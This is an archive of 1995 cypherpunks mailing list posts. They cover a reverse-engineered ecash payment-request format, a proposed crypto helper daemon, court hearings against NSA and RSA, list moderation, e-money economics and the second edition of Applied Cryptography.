>Ian Goldberg <iang@cory.EECS.Berkeley.EDU> writes:
>
>>Last week, I was taking a look at the ecash protocol (no, I don't have a copy;
>>I have a binary, which I can't even run...).  
>
>>I've managed to decipher a useful bit of the first message sent from
>>the shop to the payer.  It's the Payment Request, and contains the following
>>information:
>
>>o Header identifying packet as Payment Request
>>o The integer 4
>>o The payment amount, in cents
>>o The time (seconds since 1970)
>>o The integer 79
>>o The name of the shop (payee)
>>o A description of the item being paid for
>>o An empty string
>>o The integer 0
>>o End of Record marker
>
>That's very interesting work!  What are the string formats, are they null
>terminated or Pascal-style with a preceding count byte?  How did you
>identify "an empty string", wouldn't that just be a byte of 0?  How did
>you know it was an empty string rather than just a 0.

See below.

>Did you get this by inducing a shop to send a payment request message to
>some program you wrote which was listening on the ecash port?

Yup.  I just had a program sitting on the ecash port that hexdumped
anything fed to it.  That, and a copy of the binary to read...

>I wonder if it would be legal to write shop software which sent such a
>payment request, took the resulting coins, and deposited them in the bank
>(if we could figure out all the protocols necessary).  This particular
>sequence of operations would not appear to infringe anybody's patents -
>there are no blinding operations involved.  It's not clear how useful
>such a program would be but at least it would be one step away from the
>DigiCash monopoly.

 From what I gathered from Doug's posts a little while back, the _client_
stuff is perfectly fine; only the _bank_ stuff is Chaum-patented.

Here are the messy byte-details:

The data encoding:
---
Header:  2 bytes

0xa0 0x80+type

where type is:

0x12: Payment Request
0x0a: Payment
0x29: Length of Message
0x13: Dummy Message
(there are others)
---
EOR: 1 byte

0xa1

End of Record indicator
---
n-byte Integer:

0x90 0x80+n followed by n bytes of data, MSB first

n should probably be 1 <= n <= 4.
---
Date: 4 bytes

0x91 0x84 followed by 4 bytes of time since 1970
---
String:

0x92 0x80+(length) followed by (length) bytes
---
Data:

0x94 0x80+(length) followed by (length) bytes
---
There are other types, like 0x93 (Multi-precision integer) that I
haven't decoded yet.

=====

The first message from the shop:

a0b9 9083 0000 37a1                         # ......7.

a092 9081 0490 810a 9184 30ad 1930 9081     # ..........0..0..
4f92 8c65 7368 6f70 4063 322e 6f72 6792     # O..eshop@c2.org.
9063 6769 2d62 696e 2f64 6f72 656d 6169     # .cgi-bin/doremai
6c92 8090 8100 a1                           # l......

What it means:

a0b9: Header (Message length)
9083 000037: integer = 0x37 (length of following message)
a1: EOR

a092: Header (Payment Request)
9081 04: integer = 4
9081 0a: integer = 10 (cost in cents)
9184 30ad1930: time
9081 4f: integer = 79
928c "eshop@c2.org" : string (payee)
9290 "cgi-bin/doremail" : string (description)
9280 : empty string
9081 00: integer = 0
a1: EOR

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 23 Nov 1995 10:14:21 +0800
To: cypherpunks@toad.com
Subject: The Mesh and the Net
Message-ID: <199511230141.UAA02365@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


SciAm's December article on future high-tech carnage cites:

"The Mesh and the Net: Speculations on Armed Conflict in a
Time of Free Silicon," by Martin C. Libicki, March, 1994. 
(233kb)

Available on the Web at:

<http://www.ndu.edu/ndu/inss/macnair/mcnair28/m028cont.html>

NDU is the National Defense University, Libicki's teat.

He is quoted: "We're getting a lot of clever ideas about how
to fight a Gulf War more efficiently, but we rarely get
anything about how to fight a Vietnam more efficiently."

Here are excerpts from his preface:

   Mesh -- the term applied to military applications --
   points to the holes; as information technology places a 
finer mesh
   atop the battlefield, more objects are caught in it. Net -- 
the term
   applied to civilian applications -- points to the substance 
of the
   system; the connectivity of people and their machines 
suggests new
   patterns of social relationships and new venues for 
conflict. Silicon,
   that which is to become free, stands for both semiconductor 
chips (for
   computation) and optical fibers (for communications).
   
   Argument: The relationship of the once and future revolution 
in
   information technology to warfare is analyzed in several 
steps:
   
     * Chapter One outlines the basis for this revolution and 
explains
       why its most natural expression is the dispersion rather 
than
       accumulation of information power.
       
     * Chapter Two examines its expression on the battlefield 
in three
       aspects: Pop-up warfare, the rise of the Mesh, and the 
evolution
       of Fire-ant warfare.
       
     * Chapter Three examines whether the revolution on the 
battlefield
       translates into a commensurate revolution in military
       organization.
       
     * Chapter Four discusses implications for acquisition, 
research and
       development.
       
     * Chapter Five extends the analysis to the case of 
low-intensity
       conflict.
       
     * Chapter Six attempts a broader assessment of how 
civilian
       applications of information technology, the Net, may 
affect
       national security.
       
     * Chapter Seven contrasts the Mesh, and the Net.
       
     * The Epilogue considers certain reasons why information 
technology
       may not translate into the victory of the Small and the 
Many over
       the Few and the Large.
       
-----

<www.ndu.edu/ndu/inss> and links offer an ape-lab of global 
insecurity ebolas.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Still <x93ojg@juliet.stfx.ca>
Date: Thu, 23 Nov 1995 10:17:46 +0800
To: cypherpunks@toad.com
Subject: Re: PGP in Canada
In-Reply-To: <Pine.3.89.9511222044.B25201-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.A32.3.91.951122213807.121948C@juliet.stfx.ca>
MIME-Version: 1.0
Content-Type: text/plain


I think people may have misunderstood me.  I am able to get PGP, I just 
want to know if it is legal for me to do so as I want to install it on a 
network and am not a big fan of jail.  It would do serious things to my 
future in the Canadian military.  All I wan't to know quite simply is "Is 
it legal for me to ftp a copy of PGP.  The MIT site says that it is OK as 
long as I am exprting it to Canada for use on a machine in Canada.  
Although other sites say that it is not permitted to be exported to Canada.
 

--

	     T H E  M A N , T H E  M Y T H , T H E  L E G E N D . 
******************************************************************************
* Dylan "Still" Boudreau	* Knowledge is proud that she knows so much; *
* Internet: x93ojg@stfx.ca	* Wisdom is humble that she knows no more.   *
******************************************************************************
*       Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html       *  
******************************************************************************

		When someone says, "That's a good question." 
		 You can be sure it's a lot better than the 
		         answer you're going to get.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 23 Nov 1995 07:44:08 +0800
To: Raph Levien <raph@c2.org>
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <Pine.SUN.3.91.951122094209.29001A-100000@infinity.c2.org>
Message-ID: <Pine.BSD.3.91.951122214304.21297A-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995, Raph Levien wrote:

> On Wed, 22 Nov 1995, Carl Ellison wrote:
> 
> > >Date: Sat, 18 Nov 1995 00:42:21 -0800 (PST)
> > >From: Raph Levien <raph@c2.org>
> >
> > >   I propose that the new interface lives as a sort of daemon, rather
> > >than a static collection of command line script pieces. 
> > 
> > Danger, Will Robinson!  (see below)
> 
  attila->
    the daemon, in and off itself, is not dangerous -it becomes critical
if it is accessible via the port number tables. the problem with a user
invoked slave process via a socket mechanism is the same as with a .dll or
likable library: the application need to determine the authenticty of the
single application socket" 

    the system wide multi-process daemon has an advantage in one respect: it
can only be loaded by the administrator, and as long as each invocation 
declares (and wipes at exit) its one memory allocation, including any 
pseudo-static variables --keep in mind that it must not be tied to the 
external tables.  Therefore, in order to not be passing keys, passphrase, 
and all that good stuff across a lan, the daemon must be able to verify 
that the caller is literally local.  This works even on diskless 
workstations as long as they have sufficient memory to support the 
application and the processes are specified non-swappable.
 <-attila

>    In restrospect, "daemon" was a poor choice of words to describe my
> proposal. "Slave process" gets the idea across much better, but may be a
> bit less PC. A daemon sits on a publicly accessible port, such as a TCP/IP
> socket. The slave process is only accessible to the user who invoked it
> (enforced by the OS's file permissions). Further, it only gives secrets to
> individual processes that authenticated themselves first (by sending a
> passphrase down the connection to the slave process). 
> 
> > >   Once the negotation has been established, the application can send
> > >the daemon MIME objects that the app does not understand but the
> > >daemon does (for example, an image/fractal). The daemon can return a
> > >MIME object that the app does understand (for example, an image/ppm).
> > 
> > This part sounds good...a sort of master translation service.
> 
>    I'm glad you like it!
>
    <attila> the temptation here is to use plugins to reduce the load
component.  Again, you have the problem of tampered linkable libraries or
.dlls.  Secondly, the problem with diskless workstations rears up, again
--the diskless workstations must obtain their loadable modules from the
LAN/WAN unless RAM is infinite and everything is preloaded --except, hear
comes the LAN/WAN again before load. 

    of course, both the basic daemon and all the loadable plugins can an
also be encrypted with the header containing at least lateral and linear 
checksums, if not polynomial check subroutines for authentication. in both 
cases, the base daemon must verify the authenticity which means it needs 
a system manager modifiable list table.

    the use of public/private key pairs which can me modified for each
sight by a system manager with either a special routine or a debugger,
provides an additional level of security. 

    although you could enable a similar service between the daemon and 
the calling module using DH for each "session," thereby making it even 
harder for an interloper to monitor any IPC connections, even if LAN/WAN 
usage was permitted under these conditions --just how far do you want or 
need to push the limits of "secure."  I'll answer that the usual way for 
anyone who has written code, let alone secure code or crypto --to the max 
--better snooping tools are alway around the corner (it's just like the 
arms race).  --and, there is always the wrapper approach on top of this.
 <attila>
 
> > >   Alternatively, the daemon may request an authentication. This is
> > >useful when resolving external bodies that require authentication,
> > >including non-anonymous FTP, and standard authenticated HTTP. In this
> > >case, the daemon sends a message to the app requesting the
> > >authentication. It specifies whether it needs both username and
> > >password, or just password. In the latter case, it hands a username to
> > >the application.
> > >   The application can then query the user for the authentication
> > >data. It hands this back to the daemon. In reply, the daemon indicates
> > >success or failure. In case of success, it hands the object back to
> > >the app.
> > 
> > Now I get worried.  This communication with the demon is via some IPC --
> > maybe even via a LAN.  Some things can't be distributed safely and
> > authentication is #2 on my list.
> 
>    No, the communication is not via a LAN. On a Unix system, the 
> communication is through Domain Sockets. Both processes live on the same 
> machine, and the socket "lives" on the local file system.
>
    <attila> No, that is not is not always true; again, user space
sockets present the same security risk as loadable modules unless you have
a base socket which decrypts and authenticates each loadable module. And, 
user sockets are more easily attacked.
 <attila>
 
>    I submit that my proposal is every bit as secure as, say, PGP is now. 
> If you can't trust the operating system not to hand domain sockets from 
> one process to another, then you certainly can't trust it to, for 
> example, substitute different binaries for the crypto program (an attack 
> which Ian et al cleverly mounted a few weeks ago).
>    If it were not the case that my proposal was as secure as PGP, then I 
> would want to withdraw it. However, the proposal has so many advantages 
> that I would want to see a serious description of the attack, rather than 
> just feelings of endangerment to Will Robinson.
> 
> > >   Encryption is a bit more tricky, but in essence you just hang a
> > >premail-alike off this kind of protocol. The hard part is specifying
> > >the key, but you just call it a "parameter" and put in hooks for the
> > >daemon to ask for whatever parameters it needs. 
> > 
> > Crypto keys are #1 on my list of things you can't distribute (unless they
> > are wrapped, of course).
> 
>    I should have made it cleaer that I am referring to public keys. If 
> public keys are on the list of things that can't be distributed, then I 
> believe we are in trouble.
>
    <attila> in order for a "user" to decrypt public key paired messages,
the users private key must be passed to the daemon --obviously in a secure
packet which again can be initiated with DH; the alternative is a lookup
from a standardized location such as ~/.private/ring which can be
non-readable except by the owner or by the daemon running suid as the user
at the authentication level. 

    Personally, I would rather pass the private key from the user module
intereface in an authentication packet and not have it necessarily visible
--the same goes for the pass phrase. 
    
    this checking and rechecking may be necessary for maximum security on 
a multi-user machine, but you may have more authentication overhead than 
translation overhead in a short packet...

    and, what do you do with MickeySoft?  with as much 3.1 base code as 
there appears to be from the complaints, W95 looks like a problem for 
multi-process packetizing, etc. Maybe NT is better?  I do not use either 
and will stay with some form of BSD (Solaris and FreeBSD currently). I 
may be the last holdout on earth as the posting yesterday detailed, but I 
will be a holdout.
  <attila>
 
> > >						 This requires that
> > >keys have some nonforgeable names, which is unfortunately not a
> > >feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the
> > >Certifcation Authority (<wink> at Nick Szabo).
> > 
> > Public keys, if that's what you're talking about, have perfectly good
> > nonforgeable names -- themselves.  They are unique.  They are the proper
> > name which can collect all the attributes of that key which are of interest
> > (e.g., permission to spend $, name of a human who knows the private key,
> > attributes about that human, etc.).
> 
>    Ok. But public keys have one serious disadvantage: their size. I can't 
> put a public key on my business card or read it over the phone. I want a 
> unforgeable key name. I want this to be the standard key name in the 
> interface between the application and the crypto engine. I want users to 
> be able to specify them directly, at the very least to bootstrap the 
> public key infrastructure.
>    I propose using the MD5 hash of the whitespace-free MOSS 
> representation of the public key, in hex. It's simple enough to be 
> described in one sentence, but does everything I want.
>
    <attila> there is nothing that says you can not use a 64 or 128 bit
public key; nothing says you must use 1024 bits for the public. the fact
the private key is 1024 bits is irrelevant other than the fact it
increases security. there are some advantages of simplicity for
simplicity's sake! :)
  <attila>
 
>    Note that PGP 2.6.2 does _not_ allow the use of a public key as the 
> name of a public key, unless you do a horrible hack such as replace the 
> pubring.pgp file with the one public key of interest. This is a 
> significant problem when trying to identify which key signed a signed 
> message. I haven't bashed around with TISMOSS enough, but I'm not sure it 
> will allow this either. I got the impression that it preferred the use of 
> an alias.
> 
> > >   One final aside: I've been fairly frustrated with this mailing list
> > >as a forum for talking about real design proposals and implementation
> > >issues. Ignorant posts by the likes of Dr. Fred and Alice d'Clueless
> > >tend to attract far more attention than real crypto work. I want a
> > >forum for, and just for, cypherpunks who write code. If I had just a
> > >smidgen more free time (as if), I'd be trying to start one
> > >myself. Anyone else?
> >
    <attila> for a man with a piled higher and deeper, Dr. Fred's spelling
and grammer skills are quite poor, maybe 8th grade.  we dont need to deal
with the pompous holier than thou attitude from anyone.
    I too have a piled higher and deeper in information techniques (which
includes security). what's it worth?  Not much if you can not support it
with your actions and accomplishments. 
    ...just open your mouth Dr. Fred so we can check your IQ (Ignorance
Quotient!). 
  <attila>

> > I've seen this happen several times.  As a list gets popular, it
> > diversifies.  You might try sci.crypt.research -- since it's moderated.
> 
>    Thanks for the suggestion. However, my concerns are with 
> implementation and deployment, not research.  I am perfectly willing to 
> consider cryptographic algorithms to be black boxes that do what they say 
> they will. I think the charter exists to start a new list. John Gilmore 
> has already offered to start a "coderpunks" list on toad.com. Shall we 
> take him up on it?
> 
> Raph
> 
    <attila> The problem with a new list is that we really need a
moderated list;  the condition being that all messages dealing with code
pass if you are a member, but no one should be discriminated agains
membership --no politics, not even the alerts which we really should be
aware of as public "policy" (if you can call it that) does concern how we
approach crypto in general. sci.crypt.research is a little more techinical
that it needs to be and rarely has the give and take we have in this list
--particularly when we are kicking around a proposal (like the universal 
translator of this thread.
    I would suggest that the code arguments be cross posted to the 
current list.  we might find some interesting political considerations 
may lead to proposals for code.
    The problem is the the moderator --who has the time? If not John 
Gilmore, maybe TCM??? 
    I have more or less retired from active consulting and would do it if
I were not overcommitted including some travel for the next several months
--I do have a fast notebook, but toll charges are a bitch.  It is
important that there is "moderation" which blows away ideas despite
personal bias and preference. 
    One possible way to set the moderated list is to post as we always 
have to cypherpunks, and the moderator pops all the code related postings 
over to cypherpunks.moderated@toad.com (or whereever). This means the 
main list is complete, with the moderated list code limited. Once a 
message thread is identified, procmail would pick up the thread and 
forward it. .procmailrc commands could be handled automatically with a 
small script.
    Currently, after procmail breaks incoming into lists, I sort
cypherpunks by subject and "pre-delete" all the noise discussions (other
than a few like tcm or gilmore or perry, etc.). I could get nasty with a
more aggresive procmail (mine only splits incoming into separate lists and
wipes out Dr. Fred before it even gets to any list). 
    Do a few of us wish to hash this problem out in email?  Maybe we 
could swap the responsibility around when someone is out of town. Count 
me in, I'm all in favour of a moderated list with a reasonably controlled 
membership, not just a listproc or majordome open subscribe function.

  <attila>
 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 24 Nov 1995 02:13:02 +0800
To: gnu@toad.com
Subject: Two 'punky court hearings: Dec 6th, SF and San Jose
Message-ID: <9511231746.AA16675@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 9AM on December 6 in San Francisco, the 9th District Court of Appeals
will finally hear the appeal of my original FOIA case against NSA.

At 10AM on December 6 in San Jose, Roger Schlafly's case against RSA Data
Security will hold a hearing on the validity of the Diffie-Hellman,
Hellman-Merkle, RSA, and Schnorr patents.

Mark your calendar!

My hearing is the first (and probably only) oral arguments to the
Court of Appeals.  The overall issue is whether NSA is violating the
law by deliberately taking six months to three years to handle
ordinary FOIA requests.  (And what can/will the courts do about it.)
The specific issue that we appealed on is whether the lower-court
judge in the case has the discretion to throw out a case in which the
government is violating the law, without addressing the problem.

The legal theory is that since the courts are peoples' only recourse
when the government violates its own laws, the court system can't
simply ignore the problem.  This would mean that the people have NO
recourse against a despotic government (except armed or nonviolent
rebellion, which is a terrible solution).

There are lots of other ramifications, since NSA has built up a
formidible wall of nit-picky procedural defenses.  Since the judges
will steer the oral hearing, I don't know whether they'll focus on the
big issue or the gritty details.  I'll work on getting some of the
briefs online.

This case (CA No. 94-16165) is NOT at the Federal Building; the Court
of Appeals is at 121 Spear Street (2 Rincon Center), 4th Floor,
Courtroom 2, 9AM.  I think Rincon Center is the old Post Office at
Mission and Spear Streets.  Spear is "0th Street", downtown between
the Bay and 1st Street.

It probably won't be as much fun as the Bernstein hearings.  But if we
win (here and in a few other hearings), it could pry NSA open to
public accountability.  And this would go a long way toward making
some real progress in the crypto policy debate.  We might actually get
to see the other side's concerns!

If you come, wear a "good clothes" costume.

If I wasn't going to be at my own hearing, I'd be at Roger's.  He has
sued RSA and PKP in the hope of overturning their patents, which they
have been wielding like a club over anyone trying to make progress in
public-key cryptography.  (RSA's idea of reasonable and
non-discriminatory licensing is "How much money do you have?").
Though some companies have disputed RSA's patents, nobody has ever
made a court determine whether the patents are really valid.  Roger
aims to fill that gap.

You may even get to see Jim Bidzos ooze through the courtroom.  In an
earlier hearing in the Schlafly case, Jim claimed that Roger had
insufficient honesty and character because he had held a joint talk
with *me* at Crypto '94 about our respective lawsuits.  Jim described
me to the court as an avowed destroyer of intellectual property
rights, and strongly implied that I had unlawfully revealed their
valuable RC4 trade secret.  It ain't so, on any level, and if he says
something like it again, I want lots of witnesses.

10AM, San Jose federal court, Judge Williams' courtroom.  I hope Roger
will post more details, access info for the legal documents in the
case, and directions to the building.

	John Gilmore





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Fri, 24 Nov 1995 00:58:36 +0800
To: cypherpunks@toad.com
Subject: Re: PROPOSAL: cypherpunks-news@toad.com? (was: rand-test)
Message-ID: <9511231639.AA25523@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


<snip>
>I am inclined to agree with Perry in as much as the volume of posts to
>the cypherpunks list is greatly increased by reposts of news from
>other mailing lists, USENET newsgroups, WWW sources, newspapers, TV
>programs, films, books, talks, etc.  While some of the information
>posted is interesting, and relevant, some others are less relevant,
>bordering on noise.
>
>The proposal: a separate list for current-event reports/news/reposts.

1.  Creating a separate list, IMHO, will not stop cross-posts to the list.
People will merely add one more list to their "cc" line.

2.  More importantly, I am troubled with the "this is OUR list" attitude
that some people have expressed.  Yes, it is a pain when their are
cross-posts that are completely off-topic but, as Adam correctly points out,
some are interesting and relevant.
    One of the tenets proposed by those on this list is free speech.  Most
of us are on more than one list, so I'm assuming that most of us receive
100+ messages a day.  It is irritating to read something that's been crossed
to c|punks that has nothing to do with this list.  However, it only takes a
few seconds to arrive at that conclusion and trash the post.
    The "they are targeting this list" borders almost on paranoia.  While
some paranoia is healthy :) - it should not lead to the cry to ban posts
that have been *deemed* to be inappropriate.
    I find it interesting that those who express that the net should be a
community where expression is to be encouraged and defended - until the time
arrives when such "unsolicited/unwanted/offensive/irrelevant" expression
knocks on one's front door.

Regards -
  Lynne


*******************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison@mhv.net         |      - Go to bed."
*******************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 24 Nov 1995 00:54:47 +0800
To: sjb@universe.digex.net (Scott Brickner)
Subject: Re: MED_vac
In-Reply-To: <199511222108.QAA10547@universe.digex.net>
Message-ID: <199511231641.LAA07272@homeport.org>
MIME-Version: 1.0
Content-Type: text


Scott Brickner wrote:

| "Thomas M. Swiss" writes:
| >     A (possibly stupid) thought: could commercial key escrow help here?
| >
| >     I very much want hospitals to have fast access to my medical data if
| >my broken and bleeding body should come through their door, even if I am
| >unconscious and my personal physician cannot be reached. On the other hand,
| >I don't want anyone to be snooping through them right now.
| 
| Actually, Bell Labs outlines a system which can preserve anonymity
| under these circumstances in "The Use of Communications Networks to
| Increase Personal Privacy In a Health Insurance Architecture" at
| <URL:ftp://ftp.research.att.com/dist/anoncc/privacy.health.ps.Z>.
| 
| It's based on their anonymous credit card protocol, which is really a
| sort of identity escrow service managed by a remailer.  You might find
| it interesting.

	Maximchuck's anon credit card system depends to a huge degree
on fast, highly available remailers, but he makes no provisions for
funding them.  He suggested at a talk I attended that the Federal
Reserve could operate the one remailer that his system would use to
protect your privacy.

	Other than that, its an interesting system which uses no
public key crypto for mostly anonymous transactions.

Adam
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Twain Ecash Support" <mtwain@netcom.com>
Date: Fri, 24 Nov 1995 02:21:40 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: ecash protocol: Part 1
Message-ID: <199511231755.JAA02492@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> I know ecash has some proxy support
> but I'm not sure how it works.  There are SOCKS proxies and http proxies,
> and I don't know which it uses.  I used a logging httpd proxy to derive
> the data for the SSL challenges I did this past summer.  It might be
> interesting to post the binary data from some ecash transactions.

The Ecash firewall support works by sending the messages as multipart 
MIME messages. The browser is then set to hand the application/ecash 
message the Ecash front end.

> I wonder if it would be legal to write shop software which sent such a
> payment request, took the resulting coins, and deposited them in the bank
> (if we could figure out all the protocols necessary). 

IANAL. What would you hope to gain from creating such a piece of 
software?

--Lucky at

-- Mark Twain Ecash Support
   <mailto:support@marktwain.com>
   <http://www.marktwain.com/ecash.html>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 24 Nov 1995 04:41:21 +0800
To: cypherpunks@toad.com
Subject: Bitbux could eliminate some domestic currencies?
Message-ID: <9511232021.AA20165@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Mon, 13 Nov 1995 17:35:39 -0500
From: Dave Farber <farber@central.cis.upenn.edu>
Subject: IP: cybercash! Holy Mackeral, Andy!
To: interesting-people@eff.org (interesting-people mailing list)

>From a letter in [My dog, I mean my software, ate this part of the msg -- gnu]

"Sir, Prof Alec Chrystal ... argues that because cash is unimportant, its
replacement by smart cards will have little impact. However, cash is
virtually the only kind of money issued by government (in the UK, more than
99 per cent). If a government cannot issue cash because e-money facilitates
the use of another country's currency  for domestic transactions, it will
lose virtually all its seignorage. The government will have to issue some
=A323 billion extra gilts and then pay about =A32 billion every year in=
 extra
interest.

"Moreover, cash circulates much more quickly than bank deposits (it has a
high velocity-adjusted weight). Cash was used for almost 15 billion retail
transactions in the UK in 1993, versus 4 billion for all other methods. So
the currency in which retail transactions is priced is in practice
determined by the denomination of cash. E-money would threaten this
dominance, allowing people to stop using domestic currency completely
(other than for paying taxes).

"The importance of e-money replacing cash is greater than possible effects
on exchange rates. Rather, it might make certain currencies to all intents
and purposes disappear."

Giles Keating
head of global economics
CS First Boston
London, UK




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 24 Nov 1995 01:56:42 +0800
To: cypherpunks@toad.com
Subject: Applied Crypto 2nd Ed.
Message-ID: <199511231725.MAA24475@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm surprised no one has been giving their review of Applied
Cryptography, 2nd. Ed., AKA The Bible.

I have little time for a formal review -- my copy, purchased directly
from Bruce (I encourage people to buy straight from him -- he deserves
to get the cash!) only arrived a couple of days ago. Its an amazing
piece of work. He's outdone the 1st Edition by a large stretch, which
I wouldn't have thought possible. I've bought the hardcover -- I'll be
opening it up over and over again, I figure...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Fri, 24 Nov 1995 02:40:39 +0800
To: cypherpunks@toad.com
Subject: Re: ecash protocol: Part 1
In-Reply-To: <v02120d05acd986f50e5e@[199.2.22.120]>
Message-ID: <492e1i$smd@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <v02120d05acd986f50e5e@[199.2.22.120]>,
Douglas Barnes <cman@communities.com> wrote:
>
>> From what I gathered from Doug's posts a little while back, the _client_
>>stuff is perfectly fine; only the _bank_ stuff is Chaum-patented.
>>
>
>This is exactly backwards. Also, it is entirely possible that they
>have structured the protocol to make sure that both sides have to
>practice some element of Digicash intellectual property. What I
>said was "it is possible to create an anonymous digital cash system
>where the bank does not infringe and the client can optionally
>infringe or not infringe (sacrificing anonymity)."
>
>(See: http://www.communities.com/paper/agnostic.html)
>
>

Yes.  D'oh.  I realized this while talking to Dave shortly after I posted.
All the bank does is send back the cube root of what it received from the
client.  If the client wants to multiply by the cube of a random number
before sending to the bank, and dividing by that random number after,
that's up to it.  The system Hal mentioned, though (client sends payment
requests, receives payments, deposits them), still doesn't infringe,
as long as it doesn't do _withdrawls_.

   - Ian "Hoping he hasn't goofed up again..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 24 Nov 1995 03:01:43 +0800
To: Jay Campbell <edge@got.net>
Subject: Re: crypto for porno users
In-Reply-To: <199511230817.AAA22826@you.got.net>
Message-ID: <199511231839.NAA24795@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jay Campbell writes:
> A common way to get around prostitution sting operations is to ask the lady
> to expose sensitive portions of her anatomy to prove her sincerity before
> the would-be customer commits to any transactions; this sort of thing is
> also becoming commonplace on the net for pornography or pirated software,
> too.

Except that government agents have mailed people kiddie porn as parts
of stings. I wonder if decoy cops will expose themselves, too.

All these urban myths about undercover police are amusing but quite
useless. Yes, cops can lie about if they are cops. Yes, they can do
all sorts of things.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Fri, 24 Nov 1995 03:04:26 +0800
To: cypherpunks@toad.com
Subject: Re: ecash protocol: Part 1
In-Reply-To: <199511231755.JAA02492@netcom15.netcom.com>
Message-ID: <492fha$1um@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511231755.JAA02492@netcom15.netcom.com>,
Mark Twain Ecash Support <support@marktwain.com> wrote:
>> I wonder if it would be legal to write shop software which sent such a
>> payment request, took the resulting coins, and deposited them in the bank
>> (if we could figure out all the protocols necessary). 
>
>IANAL. What would you hope to gain from creating such a piece of 
>software?
>
A piece of ecash software which does not violate Chaumian patents, does
something useful, and for which we have _source_...

   - Ian "Speaking of which..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 24 Nov 1995 03:47:47 +0800
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security [NOISE]
In-Reply-To: <9511231357.AA10766@all.net>
Message-ID: <Pa01eD16w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


fc@all.net (Dr. Frederick B. Cohen) writes:
> This is not correct, at least according to legal precident.  If someone who
> is from Sun representes themselves as being from Sun (i.e., a Sun.Com email
> address in their signature line), then when they speak (or email) about Sun,
> its products, its policies, etc., they represent Sun.

Yes. On the positite side, the readers are likely to take more seriously
someone who's known to work for the company whose products he's discussing.
E.g., if someone writes from Netcom about Java, and I happen to know that he
works for Sun (even in a totally unrelated division), I'll suspect that he may
know more about Sun products than someone whose affiliation I don't know, and
I'll pay a little more attention to his writings.

The periodic Usenet post _What is Usenet? A second opinion_ by Edward Vielmetti
<emv@msen.com> says:

]- Disclaimers are worthless.  If you post from foobar.com, and put a note
]  on the bottom "not the opinions of foobar inc.,", you may satisfy the
]  lawyers but your corporate reputation still will be affected.  To maintain
]  a separate net.identity, post from a different site.

I agree that disclaimers are worthless. I don't agree that they would satisfy
the lawyers.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 24 Nov 1995 03:56:44 +0800
To: cypherpunks@toad.com
Subject: How to order Applied Crypto direct from Bruce Schneier
Message-ID: <199511231937.OAA24938@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Several people have asked for this. You might want to email him to ask
if the offer is still open, since this was a while back.

From: Bruce Schneier <schneier@winternet.com>
Subject: Applied Cryptography, 2nd Edition: Ordering Information
Date: Sun, 17 Sep 1995 18:09:34 -0500 (CDT)

The SECOND EDITION of APPLIED CRYPTOGRAPHY is coming in November. 
This is a major rewrite: 50% more words, 7 more chapters, and
over 1600 references.  Not only did I make corrections to the
first edition and add developments since it was published, but I
also included topics left out of the first edition.  (See table
of contents--attached.)

The second edition has lots of new algorithms (including GOST,
Blowfish, RC4, and A5), more information on the Clipper Chip and
key escrow, dozens of new protocols, more information on how PGP
works, detailed information on key management and modes of
operation, and new source code.

The second edition will be published in paperback and hardcover. 
Right now I am making both available at a 15% discount.

*****************************************************************
                          ORDER FORM

Applied Cryptography, 2nd Edition (Hardcover): $70 * .85 = $59.00
Applied Cryptography, 2nd Edition (Softcover): $50 * .85 = $42.00

          Shipping:
                    Air (U.S.):       $5 per book
                    Surface (U.S.):   $3 per book
                    Canada/Mexico:    $7 per book
                    Everywhere else:  $9 per book

Send to:

